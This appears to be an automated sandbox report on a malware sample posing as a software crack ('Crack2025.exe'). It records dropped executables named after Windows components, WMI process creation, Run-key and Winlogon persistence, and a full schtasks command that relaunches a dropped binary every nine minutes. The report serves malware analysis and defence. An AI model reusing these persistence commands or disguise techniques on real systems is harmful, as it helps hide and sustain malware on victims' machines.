                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: apphelp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: version.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: version.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Pictures\Registry.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\Crack2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: Crack2025.exeStatic file information: File size 1897478 > 1048576
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: Crack2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Crack2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Crack2025.exe
                          Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.pdb source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: Crack2025.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeFile created: C:\Crtsvc\__tmp_rar_sfx_access_check_6918671Jump to behavior
                          Source: Crack2025.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F640 push ecx; ret 0_2_00B5F653
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5EB78 push eax; ret 0_2_00B5EB96
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A900BD pushad ; iretd 9_2_00007FF7C7A900C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7A95368 push cs; ret 9_2_00007FF7C7A95379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7BF2E06 push ebx; ret 9_2_00007FF7C7BF2E09
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7E95BC1 push esi; retf 9_2_00007FF7C7E95BC7
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 9_2_00007FF7C7E91595 push edx; ret 9_2_00007FF7C7E91596
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA00BD pushad ; iretd 14_2_00007FF7C7AA00C1
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeCode function: 14_2_00007FF7C7AA5368 push cs; ret 14_2_00007FF7C7AA5379
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AD59E1 push ds; retf 35_2_00007FF7C7AD5A0F
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AB00BD pushad ; iretd 35_2_00007FF7C7AB00C1
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AB5368 push cs; ret 35_2_00007FF7C7AB5379
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AC79C7 push ebp; ret 35_2_00007FF7C7AC79C8
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 35_2_00007FF7C7AC71AE push cs; iretd 35_2_00007FF7C7AC71AF
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 36_2_00007FF7C7AB00BD pushad ; iretd 36_2_00007FF7C7AB00C1
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeCode function: 36_2_00007FF7C7AB5368 push cs; ret 36_2_00007FF7C7AB5379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA00BD pushad ; iretd 37_2_00007FF7C7AA00C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AA5368 push cs; ret 37_2_00007FF7C7AA5379
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AC59E1 push ds; retf 37_2_00007FF7C7AC5A0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AB79C7 push ebp; ret 37_2_00007FF7C7AB79C8
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 37_2_00007FF7C7AB71AE push cs; iretd 37_2_00007FF7C7AB71AF
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AB79C7 push ebp; ret 38_2_00007FF7C7AB79C8
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AB71AE push cs; iretd 38_2_00007FF7C7AB71AF
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AC59E1 push ds; retf 38_2_00007FF7C7AC5A0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA00BD pushad ; iretd 38_2_00007FF7C7AA00C1
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeCode function: 38_2_00007FF7C7AA5368 push cs; ret 38_2_00007FF7C7AA5379
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AB59E1 push ds; retf 39_2_00007FF7C7AB5A0F
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A900BD pushad ; iretd 39_2_00007FF7C7A900C1
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7A95368 push cs; ret 39_2_00007FF7C7A95379
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AA79C7 push ebp; ret 39_2_00007FF7C7AA79C8
                          Source: C:\Users\Public\Pictures\Registry.exeCode function: 39_2_00007FF7C7AA71AE push cs; iretd 39_2_00007FF7C7AA71AF
                          Source: ComComponentRuntimeMonitor.exe.0.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: Registry.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: smartscreen.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: aePhPQ5epIOPbGayHv.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: ShellExperienceHost.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234
                          Source: xP1x1VNeIAPjWsHHYbBFNFY.exe.9.drStatic PE information: section name: .text entropy: 7.575623645429234

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknownExecutable created and started: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\ZgWXldfI.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\AtYLDxzH.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\kMRvrGzk.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\tvkLaiES.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Crack2025.exeFile created: C:\Crtsvc\ComComponentRuntimeMonitor.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\SFAQXTUW.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\KbrbnaEo.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\Public\Pictures\Registry.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\Default\Desktop\ShellExperienceHost.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\ProgramData\smartscreen.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\biIGHMkD.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\ProgramData\smartscreen.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\KbrbnaEo.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\AtYLDxzH.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\ZgWXldfI.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\tvkLaiES.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\kMRvrGzk.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\biIGHMkD.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile created: C:\Users\user\Desktop\SFAQXTUW.logJump to dropped file

                          Boot Survival

                          barindex
                          Creates an autostart registry key pointing to binary in C:\Windows
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Creates an undocumented autostart registry key
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xP1x1VNeIAPjWsHHYbBFNFYJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHostJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aePhPQ5epIOPbGayHvJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComComponentRuntimeMonitorJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
